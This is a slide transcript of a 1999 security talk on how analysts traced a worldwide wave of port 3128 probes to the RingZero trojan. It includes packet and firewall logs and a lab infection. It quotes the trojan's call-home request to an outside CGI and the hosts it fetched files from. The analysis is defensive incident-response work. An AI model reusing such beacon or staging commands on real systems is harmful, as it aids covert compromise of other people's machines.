The Hunt For RingZero - PowerPoint PPT Presentation

1 / 35

About This Presentation

Title:

The Hunt For RingZero

Description:

coa8 6e01 ea60 085c 000a fbb7 3030 8080. 0001 0001 0000 0000 0664 6f6e 616c ... Protective tools include: all major anti-virus tools, nuke nabber, NFR's Back ... – PowerPoint PPT presentation

Number of Views:1853

Avg rating:3.0/5.0

Slides: 36

Provided by: North8

Category:

more less

Transcript and Presenter's Notes

Title: The Hunt For RingZero

1
The Hunt For RingZero
John Greenjegreen_at_crosslink.net
2
Outline

A word about Trojans
Getting a clue
Looking for data
How many source hosts?
The hunt for the Trojan
Game over
BoF Findings

3
Trojans
This is Rolands home computer, connected to an
ISP
4
Trojans
Driving the Bus, NETBUS
5
Deep Throat - 2140
200.31.13.8 gt 158.12.110.1.2140 udp 2 4500 001e
e104 0000 7111 8795 ac14 0d08 coa8 6e01 ea60 085c
000a fbb7 3030 8080 0001 0001 0000 0000 0664 6f6e
616c 200.31.13.8 gt 158.12.110.2.2140 udp 2 4500
001e e204 0000 7111 8694 ac14 0d08 coa8 6e02 ea60
085c 000a fbb6 3030 0000 0001 0000 0000 0000 0331
3831 0231
6
Trojans Review

The most well known trojan programs are Netbus
and Back Orifice
Protective tools include all major anti-virus
tools, nuke nabber, NFRs Back Officer Friendly
and AtGuard

7
Getting A Clue

Sept 19, 1999 Roland Grefer writes with an
AtGuard detect from his home.com cablemodem
We both commented that probes to tcp port 3128
are not that common

8
At Guard http//www.atguard.com
9
More Clues

Sept 21, 1999 - SHADOW analyst Adena Bushrod
reports similar activity
Contact other organizations
MITRE, ARL
They see it too!

10
Proxy Scanning
085835 ghostrid3r.1606 gt 192.168.2.1.80
S(0) 085836 ghostrid3r.1607 gt 192.168.2.1.8080
S(0) 085837 ghostrid3r.1609 gt 192.168.2.1.3128
S(0)
11
How Big Is This Thing?!
Intrusion detection systems ranging from home
computers with cable modems to high end
government facilities have been reporting a
large number of probes to TCP port 3128, the
squid proxy service. If your site has a network
monitoring capability and you DO NOT run squid
and you detect this pattern over the next two
weeks, please let us know by sending email to
info_at_sans.org with intrusion 3128 in the subject
line. If you are allowed to send the data trace,
please sanitize any of your site's network
information (destination host address) and send
the data trace as well. Thank you!
BIG!
12
Over 300 3128 MessagesIn Three Days
2923Sep1999 75921xxx.yyy.79.141logrejectE
100B1inboundtcp203.98.30.10xxx.yyy.149.443128
640524825 3023Sep1999 75924xxx.yyy.79.141
logrejectE100B1inboundtcp203.98.30.10xxx.y
yy.149.443128640534825 3123Sep1999
80730xxx.yyy.167.253logdropqfe0inboundtcp
196.15.173.2xxx.yyy.214.1013128640254448 32
23Sep1999 82405xxx.yyy.79.141logrejectE10
0B1inboundtcp209.203.121.119xxx.yyy.124.15431
2838204825 3323Sep1999 82411xxx.yyy.111.1
33logrejectE100B1inboundtcp194.51.132.171x
xx.yyy.170.248312811954425 3423Sep1999
85923xxx.yyy.167.253logdropqfe0inboundtcp
156.46.64.149xxx.yyy.135.194312825704448 35
23Sep1999 90049xxx.yyy.167.253logdropqfe0
inboundtcp194.51.132.171xxx.yyy.214.22831282
9324448 3623Sep1999 91451xxx.yyy.111.133l
ogrejectE100B1inboundtcp195.44.9.20xxx.yyy.
95.90312810894425 3723Sep1999
93338xxx.yyy.167.253logdropqfe0inboundtcp
212.130.192.222xxx.yyy139.66312826784848 38
23Sep1999 94013xxx.yyy.167.253logdropqfe0
inboundtcp193.125.239.105xxx.yyy.1.313128153
14848 3923Sep1999 95608xxx.yyy.167.253log
dropqfe0inboundtcp194.249.154.21xxx.yyy.27.
35312825154448 4023Sep1999
95740xxx.yyy.79.141logrejectE100B1inbound
tcp200.14.243.166xxx.yyy.123.25312848794825

Over 1000 Source Hosts!
13
What Are The Possibilities?gt 1000 Source Hosts

Spoofed
Worlds largest coordinated attack
Trojan software or malware

14
Source Host Analysis
I am almost certain that these are indeed live,
non-spoofed hosts. First, I've dumped the
tcpdump traffic with the arriving TTL values.
I've done about a dozen traceroutes back to
the source IP's and the hop counts are believably
close. Also, other clues found in the tcpdump
output itself appear to point to different hosts
or a very wise crafter.
Judy
Novak - ARL
15
The First Hot Tip - Sept 23
We began receiving probes to 3128 on Wednesday,
September 15th. The probes come in a triplet -
first to TCP port 80, then 8080, then 3128. The
probes appear to be going after random
addresses. One finally hit a web server listening
on port 80 so I got to see what it was doing. It
sent the following request to the
server Anonymous
get http//www.rusftpsearch.net/cgi-bin/pst.pl/? p
st mode writeippst host192.168.2.1pstport312
8
Later verified by four other sources.
16
So What?
Just a couple additional pieces of information.
I only probed back in a rather simple way about 5
machines and found none of those running finger,
SMTP or FTP, though all were running TCP port
139, so I concluded (with a very small sample
size) it was a Windows attack of some kind,
though I admit this is a guess based on sketchy
information.

Anonymous
17
Game Over?
I am the Network Security Officer at Vanderbilt
University. I have a system that was infected
with a trojan called RingZero and was
scanning for ports 80, 8080, and 3128. I have
pieces of the code specifically a file called
its.exe and a file that was Ring0.vxd. I am
still trying to find the original infected file
and I suspect that it was a screen saver. If
you would like more info give me a call. Ron
Marcum, Vanderbilt
18
Extreme BoF -Decoding RingZero

7PM - 2AM
My Thanks To All Involved!

19
Basic Game Plan

Move the Vanderbilt files to a safe platform
for examination
Use strings and other unix utilities to examine
the files
Targeting mechanism was a primary interest

20
Hour 1 - Gameplan Deviation

Strings, etc didnt get us too far
RingZero uses Ian Lucks Petite program to
compress the executables
Tim White volunteers to sacrifice his windows
laptop

21
Hour 2 - Deliberate Infection

Created a mini-network
2 computers, both running sniffers
Unzipped the archive
Two files its.exe, pst.exe
it was a coin-toss

22
Hour 3 - Examining ITS.EXE

Ran its.exe
removed itself from the desktop
its.exe and Ring0.xvd placed in \windows\system
directory
created an empty its.dat file
No network activity.. (

23
Traffic At Last!

After rebooting, the infected machine started
doing DNS queries for hosts named
phzforum.virtualave.net
xoom.members.com
Now were getting somewhere!

24
So What Now?

Created an entry in the infected machines hosts
file
Gave it the ip address of the sniffer
Infected machine started sending web requests on
port 80

25
Hours 4 and 5 - Reconfiguring the Sniffer Machine

Switched to Linux
Ran Apache and tcpdump
Apache logs showed that its.exe was trying to
retrieve an its.dat file from the webservers
phzforum.virtualave.net/its.dat
xoom.members.com/harmer/its.dat

26
What Should Be In ITS.DAT?

its.dat no longer existed on phzforum.virtualave.n
et
Terminal room closed before we discovered the
xoom.members.com connection
its.dat was found the following morning, but it
is encrypted?

27
Party Over? - Nope!

Getting very late
Oak Room closed
Remaining BoF members relocated to a corner,
downstairs in LaSalles

28
Hours 6 and 7 Running The PST.EXE File

Ran PST.EXE
Initial behavior was the same as the its.exe
relocated itself, etc.
PST.EXE spewed packets to
ports 80, 8080, and 3128!

29
PST.EXE Behavior

Generated a small list of random? IP addresses
Scanned all IPs for port 80, then 8080, and
finally 3128
Repeated

30
What Is It Doing Though?

Since the scan was sequential, we were able to
configure apache on-the-fly to answer web
requests for IPs in the scan.
Examining the Apache logs showed what we had
hoped for

31
The End Game
get http//www.rusftpsearch.net/cgi-bin/pst.pl/? p
st mode writeippst host192.168.2.1pstport312
8
The proxy is being used to send its own IP
address and proxy port home to the mothership
!
32
Review of Findings